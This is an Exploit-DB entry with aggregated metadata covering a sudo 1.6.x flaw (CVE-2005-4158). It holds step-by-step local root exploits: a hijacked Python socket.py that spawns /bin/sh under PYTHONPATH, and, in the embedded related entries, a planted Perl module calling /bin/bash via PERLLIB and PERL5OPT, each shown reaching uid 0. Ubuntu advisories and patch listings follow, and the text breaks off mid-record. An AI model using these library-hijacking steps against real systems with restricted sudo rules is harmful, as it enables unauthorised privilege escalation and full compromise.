ID EDB-ID:27057 Type exploitdb Reporter Breno Silva Pinto Modified 2006-01-09T00:00:00
Description
Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (2). CVE-2005-4158. Local exploit for linux platform
source: http://www.securityfocus.com/bid/16184/info
Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables.
A local attacker with the ability to run Python scripts can exploit this vulnerability to gain access to an interactive Python prompt. That attacker may then execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.
An attacker must have the ability to run Python scripts through Sudo to exploit this vulnerability.
This issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Security Bypass Vulnerability).
## Sudo local root escalation privilege ##
## vuln versions : sudo < 1.6.8p10
## adv : http://www.securityfocus.com/bid/16184
## by breno - breno at kalangolinux dot org
## You need sudo access execution for some python script ##
## First look sudoers file. User 'breno' can execute expl_python_sudo.py script
breno ~ $ -> cat /etc/sudoers
breno ALL=(ALL) /home/breno/expl_python_sudo.py
## Second, see our simple PoC python script
breno ~ $ -> cat /home/breno/expl_python_sudo.py
#!/usr/bin/python
import sys
import socket
import os
print "Python Sudo Exploit"
exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.close()
breno ~ $ ->
## Sexy !! Do nothing :)
## Ok. What you need to do to get root is hijacking socket.py module , change close()
function to execute something and
## change PYTHONPTAH env.
breno ~ $ -> cp /usr/lib/python2.3/socket.py /home/breno/
breno ~ $ -> vi /home/breno/socket.py
...
import os
...
def close(self):
os.execl("/bin/sh","/bin/ah");
self._sock = _closedsocket()
self.send = self.recv = self.sendto = self.recvfrom = self._sock._dummy
close.__doc__ = _realsocket.close.__doc__
...
## Ok .. save it and export env
breno ~ $ -> export PYTHONPATH=/home/breno
## .. and execute script. Too much sexy !!!
breno ~ $ -> sudo /home/breno/expl_python_sudo.py
Python Sudo Exploit
root ~ # -> id
uid=0(root) gid=0(root) grupos=0(root)
root ~ # ->
{"id": "EDB-ID:27057", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability 2", "description": "Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (2). CVE-2005-4158. Local exploit for linux platform", "published": "2006-01-09T00:00:00", "modified": "2006-01-09T00:00:00", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/27057/", "reporter": "Breno Silva Pinto", "references": [], "cvelist": ["CVE-2005-4158"], "lastseen": "2016-02-03T05:01:15", "viewCount": 142, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2016-02-03T05:01:15", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-4158"]}, {"type": "ubuntu", "idList": ["USN-235-1", "USN-235-2"]}, {"type": "exploitdb", "idList": ["EDB-ID:26498", "EDB-ID:27056"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:10933"]}, {"type": "nessus", "idList": ["UBUNTU_USN-235-2.NASL", "MANDRAKE_MDKSA-2006-159.NASL", "UBUNTU_USN-235-1.NASL", "MANDRAKE_MDKSA-2005-234.NASL", "DEBIAN_DSA-946.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:56531", "OPENVAS:56192"]}, {"type": "osvdb", "idList": ["OSVDB:20764"]}, {"type": "debian", "idList": ["DEBIAN:DSA-946-2:8641C", "DEBIAN:DSA-946-1:530F0"]}], "modified": "2016-02-03T05:01:15", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://www.exploit-db.com/download/27057/", "sourceData": "source: http://www.securityfocus.com/bid/16184/info\r\n \r\nSudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables.\r\n \r\nA local attacker with the ability to run Python scripts can exploit this vulnerability to gain access to an interactive Python prompt. That attacker may then execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.\r\n \r\nAn attacker must have the ability to run Python scripts through Sudo to exploit this vulnerability.\r\n \r\nThis issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Security Bypass Vulnerability). \r\n\r\n## Sudo local root escalation privilege ##\r\n## vuln versions : sudo < 1.6.8p10\r\n## adv : http://www.securityfocus.com/bid/16184\r\n## by breno - breno at kalangolinux dot org\r\n\r\n## You need sudo access execution for some python script ##\r\n\r\n\r\n## First look sudoers file. User 'breno' can execute expl_python_sudo.py script\r\n\r\nbreno ~ $ -> cat /etc/sudoers\r\n\r\nbreno ALL=(ALL) /home/breno/expl_python_sudo.py\r\n\r\n## Second, see our simple PoC python script\r\n\r\nbreno ~ $ -> cat /home/breno/expl_python_sudo.py\r\n#!/usr/bin/python\r\nimport sys\r\nimport socket\r\nimport os\r\n\r\nprint \"Python Sudo Exploit\"\r\nexp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nexp.close()\r\nbreno ~ $ ->\r\n\r\n## Sexy !! Do nothing :)\r\n\r\n## Ok. What you need to do to get root is hijacking socket.py module , change close()\r\nfunction to execute something and\r\n## change PYTHONPTAH env.\r\n\r\nbreno ~ $ -> cp /usr/lib/python2.3/socket.py /home/breno/\r\n\r\nbreno ~ $ -> vi /home/breno/socket.py\r\n...\r\nimport os\r\n...\r\ndef close(self):\r\nos.execl(\"/bin/sh\",\"/bin/ah\");\r\nself._sock = _closedsocket()\r\nself.send = self.recv = self.sendto = self.recvfrom = self._sock._dummy\r\nclose.__doc__ = _realsocket.close.__doc__\r\n...\r\n\r\n## Ok .. save it and export env\r\n\r\nbreno ~ $ -> export PYTHONPATH=/home/breno\r\n\r\n## .. and execute script. Too much sexy !!!\r\n\r\nbreno ~ $ -> sudo /home/breno/expl_python_sudo.py\r\nPython Sudo Exploit\r\nroot ~ # -> id\r\nuid=0(root) gid=0(root) grupos=0(root)\r\nroot ~ # ->\r\n", "osvdbidlist": ["20764"]}
{"cve": [{"lastseen": "2021-02-02T05:24:40", "description": "Sudo before 1.6.8 p12, when the Perl taint flag is off, does not clear the (1) PERLLIB, (2) PERL5LIB, and (3) PERL5OPT environment variables, which allows limited local users to cause a Perl script to include and execute arbitrary library files that have the same name as library files that are included by the script.", "edition": 4, "cvss3": {}, "published": "2005-12-11T02:03:00", "title": "CVE-2005-4158", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-4158"], "modified": "2017-07-20T01:29:00", "cpe": ["cpe:/a:todd_miller:sudo:1.6.5", "cpe:/a:todd_miller:sudo:1.6.8_p9", "cpe:/a:todd_miller:sudo:1.6.4_p1", "cpe:/a:todd_miller:sudo:1.5.7", "cpe:/a:todd_miller:sudo:1.5.9", "cpe:/a:todd_miller:sudo:1.6.8_p1", "cpe:/a:todd_miller:sudo:1.6.7_p5", "cpe:/a:todd_miller:sudo:1.6.7", "cpe:/a:todd_miller:sudo:1.6.3_p2", "cpe:/a:todd_miller:sudo:1.6.3_p5", "cpe:/a:todd_miller:sudo:1.6.6", "cpe:/a:todd_miller:sudo:1.6.4_p2", "cpe:/a:todd_miller:sudo:1.6.5_p2", "cpe:/a:todd_miller:sudo:1.6.3_p4", "cpe:/a:todd_miller:sudo:1.5.8", "cpe:/a:todd_miller:sudo:1.6.4", "cpe:/a:todd_miller:sudo:1.6.5_p1", "cpe:/a:todd_miller:sudo:1.6.3_p7", "cpe:/a:todd_miller:sudo:1.6.8_p8", "cpe:/a:todd_miller:sudo:1.6.1", "cpe:/a:todd_miller:sudo:1.6.8", "cpe:/a:todd_miller:sudo:1.6.8_p7", "cpe:/a:todd_miller:sudo:1.5.6", "cpe:/a:todd_miller:sudo:1.6.2", "cpe:/a:todd_miller:sudo:1.6.3_p1", "cpe:/a:todd_miller:sudo:1.6.3", "cpe:/a:todd_miller:sudo:1.6.3_p6", "cpe:/a:todd_miller:sudo:1.6.8_p5", "cpe:/a:todd_miller:sudo:1.6.3_p3", "cpe:/a:todd_miller:sudo:1.6"], "id": "CVE-2005-4158", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4158", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:todd_miller:sudo:1.6.4_p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.4_p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.3_p6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.3_p7:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.7_p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.8_p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.3_p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.3_p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.8_p5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.3_p4:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.8_p9:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.3_p3:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.8_p7:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.8_p8:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.3_p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.5_p2:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.5_p1:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:todd_miller:sudo:1.6.4:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T17:42:09", "bulletinFamily": "unix", "cvelist": ["CVE-2005-4158"], "description": "Charles Morris discovered a privilege escalation vulnerability in \nsudo. On executing Perl scripts with sudo, various environment \nvariables that affect Perl's library search path were not cleaned \nproperly. If sudo is set up to grant limited sudo execution of Perl \nscripts to normal users, this could be exploited to run arbitrary \ncommands as the target user.\n\nThis security update also filters out environment variables that can \nbe exploited similarly with Python, Ruby, and zsh scripts.\n\nPlease note that this does not affect the default Ubuntu installation, \nor any setup that just grants full root privileges to certain users.", "edition": 5, "modified": "2006-01-06T00:00:00", "published": "2006-01-06T00:00:00", "id": "USN-235-1", "href": "https://ubuntu.com/security/notices/USN-235-1", "title": "sudo vulnerability", "type": "ubuntu", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-09T17:43:40", "bulletinFamily": "unix", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "description": "USN-235-1 fixed a vulnerability in sudo's handling of environment \nvariables. Tavis Ormandy noticed that sudo did not filter out the \nPYTHONINSPECT environment variable, so that users with the limited \nprivilege of calling a python script with sudo could still escalate \ntheir privileges.\n\nFor reference, this is the original advisory:\n\nCharles Morris discovered a privilege escalation vulnerability in \nsudo. On executing Perl scripts with sudo, various environment \nvariables that affect Perl's library search path were not cleaned \nproperly. If sudo is set up to grant limited sudo execution of Perl \nscripts to normal users, this could be exploited to run arbitrary \ncommands as the target user.\n\nThis security update also filters out environment variables that can \nbe exploited similarly with Python, Ruby, and zsh scripts.\n\nPlease note that this does not affect the default Ubuntu \ninstallation, \nor any setup that just grants full root privileges to certain users.", "edition": 15, "modified": "2006-01-09T00:00:00", "published": "2006-01-09T00:00:00", "id": "USN-235-2", "href": "https://ubuntu.com/security/notices/USN-235-2", "title": "sudo vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T05:01:08", "description": "Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability (1). CVE-2005-4158. Local exploit for linux platform", "published": "2006-01-09T00:00:00", "type": "exploitdb", "title": "Sudo 1.6.x Environment Variable Handling Security Bypass Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4158"], "modified": "2006-01-09T00:00:00", "id": "EDB-ID:27056", "href": "https://www.exploit-db.com/exploits/27056/", "sourceData": "source: http://www.securityfocus.com/bid/16184/info\r\n\r\nSudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables.\r\n\r\nA local attacker with the ability to run Python scripts can exploit this vulnerability to gain access to an interactive Python prompt. That attacker may then execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.\r\n\r\nAn attacker must have the ability to run Python scripts through Sudo to exploit this vulnerability.\r\n\r\nThis issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Security Bypass Vulnerability). \r\n\r\n## Sudo local root exploit ##\r\n## vuln versions : sudo < 1.6.8p12\r\n## adv : http://www.securityfocus.com/bid/15394\r\n## adv : http://www.frsirt.com/bulletins/2642\r\n\r\n##by breno - breno@kalangolinux.org\r\n\r\n## You need execute access to perl script in sudo ##\r\n\r\n## cat /etc/sudoers ##\r\n\r\nbreno ALL=(ALL) /home/breno/code.pl\r\n\r\n## Now let's create your own perl module FTP.pm :) good name.\r\n\r\nbreno ~ $ -> mkdir modules\r\nbreno ~ $ -> mkdir FTP\r\nbreno ~/modules $ -> ls\r\nFTP\r\nbreno ~/modules $ -> cd FTP\r\nbreno ~/modules/FTP $ -> h2xs -AXc -n FTP\r\nDefaulting to backwards compatibility with perl 5.8.7\r\nIf you intend this module to be compatible with earlier perl versions, please\r\nspecify a minimum perl version with the -b option.\r\n\r\nWriting FTP/lib/FTP.pm\r\nWriting FTP/Makefile.PL\r\nWriting FTP/README\r\nWriting FTP/t/FTP.t\r\nWriting FTP/Changes\r\nWriting FTP/MANIFEST\r\nbreno ~/modules/FTP $ ->\r\n\r\nbreno ~/modules/FTP/FTP $ -> perl Makefile.PL\r\nChecking if your kit is complete...\r\nLooks good\r\nWriting Makefile for FTP\r\nbreno ~/modules/FTP/FTP $ -> make\r\ncp lib/FTP.pm blib/lib/FTP.pm\r\nManifying blib/man3/FTP.3pm\r\nbreno ~/modules/FTP/FTP $ -> make test\r\nPERL_DL_NONLAZY=1 /usr/bin/perl \"-MExtUtils::Command::MM\" \"-e\" \"test_harness(0,\r\n'blib/lib', 'blib/arch')\" t/*.t\r\nt/FTP....ok\r\nAll tests successful.\r\nFiles=1, Tests=1, 0 wallclock secs ( 0.03 cusr + 0.01 csys = 0.04 CPU)\r\nbreno ~/modules/FTP/FTP $ ->\r\n\r\n#Now i deleted the default FTP.pm (it was ugly), and create my beautiful module\r\n\r\nbreno ~/modules/FTP/FTP/blib/lib $ -> vi FTP.pm\r\n\r\npackage FTP;\r\n\r\nuse strict;\r\nuse vars qw($VERSION);\r\n$VERSION = '0.01';\r\n\r\nsub new {\r\n my $package = shift;\r\n return bless({}, $package);\r\n}\r\n\r\nsub verbose {\r\n my $self = shift;\r\n system(\"/bin/bash\");\r\n if (@_) {\r\n $self->{'verbose'} = shift;\r\n }\r\n return $self->{'verbose'};\r\n}\r\n\r\nsub hoot {\r\n my $self = shift;\r\n return \"Don't pollute!\" if $self->{'verbose'};\r\n return;\r\n}\r\n\r\n1;\r\n__END__\r\n\r\nEOF\r\n\r\n# Remenber our super code.pl\r\n\r\nbreno ~ $ -> vi code.pl\r\n\r\n#!/usr/bin/perl\r\n\r\nBEGIN { $| = 1; print \"1..1\\n\"; }\r\nEND {print \"not ok 1\\n\" unless $loaded;}\r\nuse FTP;\r\n$loaded = 1;\r\nprint \"ok 1\\n\";\r\n\r\nmy $obj = new FTP;\r\n$obj->verbose(1);\r\nmy $result = $obj->hoot;\r\nprint ($result eq \"Don't pollute!\" ? \"ok 2\\n\" : \"not ok 2\\n\");\r\n\r\n$obj->verbose(0);\r\nmy $result = $obj->hoot;\r\nprint ($result eq \"\" ? \"ok 3\\n\" : \"not ok 3\\n\");\r\n\r\n\r\nEOF\r\n\r\n\r\n# Now let's play with PERLLIB and PERL5OPT env.\r\n\r\nbreno ~ $ -> export PERLLIB=\"/home/breno/modules/FTP/FTP/blib/lib/\"\r\nbreno ~ $ -> export PERL5OPT=\"-MFTP\"\r\n\r\n# Now get Root!! :)\r\n\r\nbreno ~ $ -> sudo ./code.pl\r\nPassword:\r\n1..1\r\nok 1\r\nroot ~ # -> id\r\nuid=0(root) gid=0(root) grupos=0(root)\r\nroot ~ # ->\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/27056/"}, {"lastseen": "2016-02-03T03:44:15", "description": "Sudo Perl 1.6.x Environment Variable Handling Security Bypass Vulnerability. CVE-2005-4158. Local exploit for linux platform", "published": "2005-11-11T00:00:00", "type": "exploitdb", "title": "Sudo Perl 1.6.x Environment Variable Handling Security Bypass Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-4158"], "modified": "2005-11-11T00:00:00", "id": "EDB-ID:26498", "href": "https://www.exploit-db.com/exploits/26498/", "sourceData": "source: http://www.securityfocus.com/bid/15394/info\r\n\r\nSudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling the 'PERLLIB', 'PERL5LIB', and 'PERL5OPT' environment variables when tainting is ignored.\r\n\r\nAn attacker can exploit this vulnerability to bypass security restrictions and include arbitrary library files.\r\n\r\nTo exploit this vulnerability, an attacker must be able to run Perl scripts through Sudo.\r\n\r\n## Sudo local root exploit ##\r\n## vuln versions : sudo < 1.6.8p12\r\n## adv : http://www.securityfocus.com/bid/15394\r\n## adv : http://www.frsirt.com/bulletins/2642\r\n\r\n##by breno - breno@kalangolinux.org\r\n\r\n## You need execute access to perl script in sudo ##\r\n\r\n## cat /etc/sudoers ##\r\n\r\nbreno ALL=(ALL) /home/breno/code.pl\r\n\r\n## Now let's create your own perl module FTP.pm :) good name.\r\n\r\nbreno ~ $ -> mkdir modules\r\nbreno ~ $ -> mkdir FTP\r\nbreno ~/modules $ -> ls\r\nFTP\r\nbreno ~/modules $ -> cd FTP\r\nbreno ~/modules/FTP $ -> h2xs -AXc -n FTP\r\nDefaulting to backwards compatibility with perl 5.8.7\r\nIf you intend this module to be compatible with earlier perl versions, please\r\nspecify a minimum perl version with the -b option.\r\n\r\nWriting FTP/lib/FTP.pm\r\nWriting FTP/Makefile.PL\r\nWriting FTP/README\r\nWriting FTP/t/FTP.t\r\nWriting FTP/Changes\r\nWriting FTP/MANIFEST\r\nbreno ~/modules/FTP $ ->\r\n\r\nbreno ~/modules/FTP/FTP $ -> perl Makefile.PL\r\nChecking if your kit is complete...\r\nLooks good\r\nWriting Makefile for FTP\r\nbreno ~/modules/FTP/FTP $ -> make\r\ncp lib/FTP.pm blib/lib/FTP.pm\r\nManifying blib/man3/FTP.3pm\r\nbreno ~/modules/FTP/FTP $ -> make test\r\nPERL_DL_NONLAZY=1 /usr/bin/perl \"-MExtUtils::Command::MM\" \"-e\" \"test_harness(0,\r\n'blib/lib', 'blib/arch')\" t/*.t\r\nt/FTP....ok\r\nAll tests successful.\r\nFiles=1, Tests=1, 0 wallclock secs ( 0.03 cusr + 0.01 csys = 0.04 CPU)\r\nbreno ~/modules/FTP/FTP $ ->\r\n\r\n#Now i deleted the default FTP.pm (it was ugly), and create my beautiful module\r\n\r\nbreno ~/modules/FTP/FTP/blib/lib $ -> vi FTP.pm\r\n\r\npackage FTP;\r\n\r\nuse strict;\r\nuse vars qw($VERSION);\r\n$VERSION = '0.01';\r\n\r\nsub new {\r\n my $package = shift;\r\n return bless({}, $package);\r\n}\r\n\r\nsub verbose {\r\n my $self = shift;\r\n system(\"/bin/bash\");\r\n if (@_) {\r\n $self->{'verbose'} = shift;\r\n }\r\n return $self->{'verbose'};\r\n}\r\n\r\nsub hoot {\r\n my $self = shift;\r\n return \"Don't pollute!\" if $self->{'verbose'};\r\n return;\r\n}\r\n\r\n1;\r\n__END__\r\n\r\nEOF\r\n\r\n# Remenber our super code.pl\r\n\r\nbreno ~ $ -> vi code.pl\r\n\r\n#!/usr/bin/perl\r\n\r\nBEGIN { $| = 1; print \"1..1\\n\"; }\r\nEND {print \"not ok 1\\n\" unless $loaded;}\r\nuse FTP;\r\n$loaded = 1;\r\nprint \"ok 1\\n\";\r\n\r\nmy $obj = new FTP;\r\n$obj->verbose(1);\r\nmy $result = $obj->hoot;\r\nprint ($result eq \"Don't pollute!\" ? \"ok 2\\n\" : \"not ok 2\\n\");\r\n\r\n$obj->verbose(0);\r\nmy $result = $obj->hoot;\r\nprint ($result eq \"\" ? \"ok 3\\n\" : \"not ok 3\\n\");\r\n\r\n\r\nEOF\r\n\r\n\r\n# Now let's play with PERLLIB and PERL5OPT env.\r\n\r\nbreno ~ $ -> export PERLLIB=\"/home/breno/modules/FTP/FTP/blib/lib/\"\r\nbreno ~ $ -> export PERL5OPT=\"-MFTP\"\r\n\r\n# Now get Root!! :)\r\n\r\nbreno ~ $ -> sudo ./code.pl\r\nPassword:\r\n1..1\r\nok 1\r\nroot ~ # -> id\r\nuid=0(root) gid=0(root) grupos=0(root)\r\nroot ~ # ->\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26498/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:15", "bulletinFamily": "software", "cvelist": ["CVE-2005-4158"], "description": "===========================================================\r\nUbuntu Security Notice USN-235-2 January 09, 2006\r\nsudo vulnerability\r\nCVE-2005-4158\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 4.10 (Warty Warthog)\r\nUbuntu 5.04 (Hoary Hedgehog)\r\nUbuntu 5.10 (Breezy Badger)\r\n\r\nThe following packages are affected:\r\n\r\nsudo\r\n\r\nThe problem can be corrected by upgrading the affected package to\r\nversion 1.6.7p5-1ubuntu4.5 (for Ubuntu 4.10), 1.6.8p5-1ubuntu2.4 (for\r\nUbuntu 5.04), or 1.6.8p9-2ubuntu2.3 (for Ubuntu 5.10). In general, a\r\nstandard system upgrade is sufficient to effect the necessary changes.\r\n\r\nDetails follow:\r\n\r\nUSN-235-1 fixed a vulnerability in sudo's handling of environment\r\nvariables. Tavis Ormandy noticed that sudo did not filter out the\r\nPYTHONINSPECT environment variable, so that users with the limited\r\nprivilege of calling a python script with sudo could still escalate\r\ntheir privileges.\r\n\r\nFor reference, this is the original advisory:\r\n\r\n Charles Morris discovered a privilege escalation vulnerability in\r\n sudo. On executing Perl scripts with sudo, various environment\r\n variables that affect Perl's library search path were not cleaned\r\n properly. If sudo is set up to grant limited sudo execution of Perl\r\n scripts to normal users, this could be exploited to run arbitrary\r\n commands as the target user.\r\n\r\n This security update also filters out environment variables that can\r\n be exploited similarly with Python, Ruby, and zsh scripts.\r\n\r\n Please note that this does not affect the default Ubuntu\r\n installation,\r\n or any setup that just grants full root privileges to certain users.\r\n\r\n\r\nUpdated packages for Ubuntu 4.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.5.diff.gz\r\n Size/MD5: 28087 c4c49fb56eaf07d8d8312e1563de869a\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.5.dsc\r\n Size/MD5: 585 0dfe580569af7a6f75aeb51462d26ca6\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5.orig.tar.gz\r\n Size/MD5: 349785 55d503e5c35bf1ea83d38244e0242aaf\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.5_amd64.deb\r\n Size/MD5: 156652 4753cf309a44e54bf6138e9079f2ab30\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.5_i386.deb\r\n Size/MD5: 146076 2bc7039c20afd55c7c582edf41fda32c\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 153628 9d11cfcfa5032bfb13e5c3e191617cdf\r\n\r\nUpdated packages for Ubuntu 5.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.4.diff.gz\r\n Size/MD5: 31718 cc1670e4bf8f650c084e18d55e190c3c\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.4.dsc\r\n Size/MD5: 585 141818c0d2b26303249d6d52c26ce30e\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5.orig.tar.gz\r\n Size/MD5: 584832 03538d938b8593d6f1d66ec6c067b5b5\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.4_amd64.deb\r\n Size/MD5: 170814 caeb3203cb545fbe24c1a7aa96bc6458\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.4_i386.deb\r\n Size/MD5: 159028 f4eabdef51f7cfc9a113ced11357fcfa\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.4_powerpc.deb\r\n Size/MD5: 165906 6fc233ccadceec79b1549d5edc387f3e\r\n\r\nUpdated packages for Ubuntu 5.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.3.diff.gz\r\n Size/MD5: 28883 2dc82337e89f8b2ec2298e31013d041c\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.3.dsc\r\n Size/MD5: 585 03cdee65604b21bb9c0a1a1d8a530d36\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9.orig.tar.gz\r\n Size/MD5: 585509 6d0346abd16914956bc7ea4f17fc85fb\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.3_amd64.deb\r\n Size/MD5: 172726 350f0454c379778fec471c47107428ab\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.3_i386.deb\r\n Size/MD5: 159132 127092a5fc0522ed272df38216d31acc\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.3_powerpc.deb\r\n Size/MD5: 167288 e049b18ebc0b282e513a3e20427ef4be", "edition": 1, "modified": "2006-01-09T00:00:00", "published": "2006-01-09T00:00:00", "id": "SECURITYVULNS:DOC:10933", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10933", "title": "[Full-disclosure] [USN-235-2] sudo vulnerability", "type": "securityvulns", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-20T15:27:55", "description": "Charles Morris discovered a privilege escalation vulnerability in\nsudo. On executing Perl scripts with sudo, various environment\nvariables that affect Perl's library search path were not cleaned\nproperly. If sudo is set up to grant limited sudo execution of Perl\nscripts to normal users, this could be exploited to run arbitrary\ncommands as the target user.\n\nThis security update also filters out environment variables that can\nbe exploited similarly with Python, Ruby, and zsh scripts.\n\nPlease note that this does not affect the 